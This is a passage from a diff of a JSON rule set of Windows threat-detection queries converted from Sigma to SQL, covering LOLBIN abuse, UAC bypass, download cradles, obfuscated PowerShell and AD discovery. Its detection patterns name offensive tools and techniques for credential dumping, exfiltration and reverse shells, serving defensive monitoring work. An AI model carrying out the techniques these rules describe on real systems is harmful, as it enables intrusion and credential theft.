\\\\System32\\\\%' ESCAPE '\\')" ], - "filename": "posh_pc_powercat.yml" + "filename": "proc_creation_win_uac_bypass_trustedpath.yml" }, { - "title": "Renamed Powershell Under Powershell Channel", - "id": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", + "title": "OpenWith.exe Executes Specified Binary", + "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "status": "test", - "description": "Detects renamed powershell", - "author": "Harish Segar, frack113", + "description": "The OpenWith.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostName = 'ConsoleHost' AND NOT ((HostApplication LIKE 'powershell.exe%' ESCAPE '\\' OR HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" ], - "filename": "posh_pc_renamed_powershell.yml" + "filename": "proc_creation_win_lolbin_openwith.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module", - "id": "38a7625e-b2cb-485d-b83d-aff137d859f4", + "title": "User Discovery And Export Via Get-ADUser Cmdlet", + "id": "1114e048-b69c-4f41-bc20-657245ae6e3f", "status": "experimental", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "author": "frack113", + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (ContextInfo LIKE '%-ModuleName %' ESCAPE '\\' OR ContextInfo LIKE '%-ModulePath %' ESCAPE '\\' OR ContextInfo LIKE '%-ScriptBlock %' ESCAPE '\\' OR ContextInfo LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADUser %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml" + "filename": "proc_creation_win_powershell_user_discovery_get_aduser.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", - "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", + "title": "New Network Trace Capture Started Via Netsh.EXE", + "id": "d3c3861d-c504-4c77-ba55-224ba82d0118", + "status": "test", + "description": "Detects the execution of netsh with the \"trace\" flag in order to start a network capture", + "author": "Kutepov Anton, oscd.community", + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ], + "falsepositives": [ + "Legitimate administration activity" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_netsh_packet_capture.yml" + }, + { + "title": "Php Inline Command Execution", + "id": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of php using the \"-r\" flag. This is could be used as a way to launch a reverse shell or execute live php code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR OriginalFileName = 'php.exe') AND CommandLine LIKE '% -r%' ESCAPE '\\')" ], - "filename": "posh_pm_susp_invocation_generic.yml" + "filename": "proc_creation_win_php_inline_command_execution.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", - "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "UAC Bypass Using Disk Cleanup", + "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "status": "test", + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" }, { - "title": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", - "id": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", + "title": "Windows Update Client LOLBIN", + "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", "status": "experimental", - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "description": "Detects code execution via the Windows Update client (wuauclt)", + "author": "FPT.EagleEye Team", "tags": [ - "attack.defense_evasion", + "attack.command_and_control", + "attack.execution", + "attack.t1105", "attack.t1218" ], "falsepositives": [ - "App-V clients" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "posh_pm_syncappvpublishingserver_exe.yml" + "filename": "proc_creation_win_wuauclt_execution.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", - "id": "a23791fe-8846-485a-b16b-ca691e1b03d4", + "title": "Potential COM Objects Download Cradles Usage - Process Creation", + "id": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", + "author": "frack113", "falsepositives": [ - "Unknown" + "Legitimate use of the library" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%rundll32.exe%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND Payload LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (CommandLine LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR CommandLine LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR CommandLine LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR CommandLine LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_rundll.yml" + "filename": "proc_creation_win_powershell_download_com_cradles.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module", - "id": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", + "title": "Use of Pcalua For Execution", + "id": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", + "author": "Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use by a via a batch script or by an administrator." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%new-object%' ESCAPE '\\' AND Payload LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (Payload LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR Payload LIKE '%system.io.streamreader%' ESCAPE '\\') AND Payload LIKE '%readtoend' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' AND CommandLine LIKE '% -a%' ESCAPE '\\')" ], - "filename": "posh_pm_invoke_obfuscation_via_compress.yml" + "filename": "proc_creation_win_lolbin_pcalua.yml" }, { - "title": "Malicious PowerShell Commandlets - PoshModule", - "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "title": "Suspicious HH.EXE Execution", + "id": "e8a95b5e-c891-46e2-b33a-93937d3abc31", "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_malicious_commandlets.yml" + "filename": "proc_creation_win_hh_susp_execution.yml" }, { - "title": "AD Groups Or Users Enumeration Using PowerShell - PoshModule", - "id": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", - "status": "test", - "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", - "author": "frack113", + "title": "PUA - Potential PE Metadata Tamper Using Rcedit", + "id": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", + "status": "experimental", + "description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", + "author": "Micah Babinski", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.defense_evasion", + "attack.t1036.003", + "attack.t1036", + "attack.t1027.005", + "attack.t1027" ], "falsepositives": [ - "Administrator script" + "Legitimate use of the tool by administrators or users to update metadata of a binary" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR ContextInfo LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR (Payload LIKE '%get-aduser%' ESCAPE '\\' AND Payload LIKE '%-f %' ESCAPE '\\' AND Payload LIKE '%-pr %' ESCAPE '\\' AND Payload LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\') OR (ContextInfo LIKE '%get-aduser%' ESCAPE '\\' AND ContextInfo LIKE '%-f %' ESCAPE '\\' AND ContextInfo LIKE '%-pr %' ESCAPE '\\' AND ContextInfo LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rcedit-x64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rcedit-x86.exe' ESCAPE '\\') OR Description = 'Edit resources of exe' OR Product = 'rcedit') AND CommandLine LIKE '%--set-%' ESCAPE '\\' AND (CommandLine LIKE '%OriginalFileName%' ESCAPE '\\' OR CommandLine LIKE '%CompanyName%' ESCAPE '\\' OR CommandLine LIKE '%FileDescription%' ESCAPE '\\' OR CommandLine LIKE '%ProductName%' ESCAPE '\\' OR CommandLine LIKE '%ProductVersion%' ESCAPE '\\' OR CommandLine LIKE '%LegalCopyright%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_ad_group_reco.yml" + "filename": "proc_creation_win_pua_rcedit_execution.yml" }, { - "title": "Bad Opsec Powershell Code Artifacts", - "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", - "status": "test", - "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", - "author": "ok @securonix invrep_de, oscd.community", + "title": "HackTool - Jlaive In-Memory Assembly Execution", + "id": "0a99eb3e-1617-41bd-b095-13dc767f3def", + "status": "experimental", + "description": "Detects the use of Jlaive to execute assemblies in a copied PowerShell", + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059.003" ], "falsepositives": [ - "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload 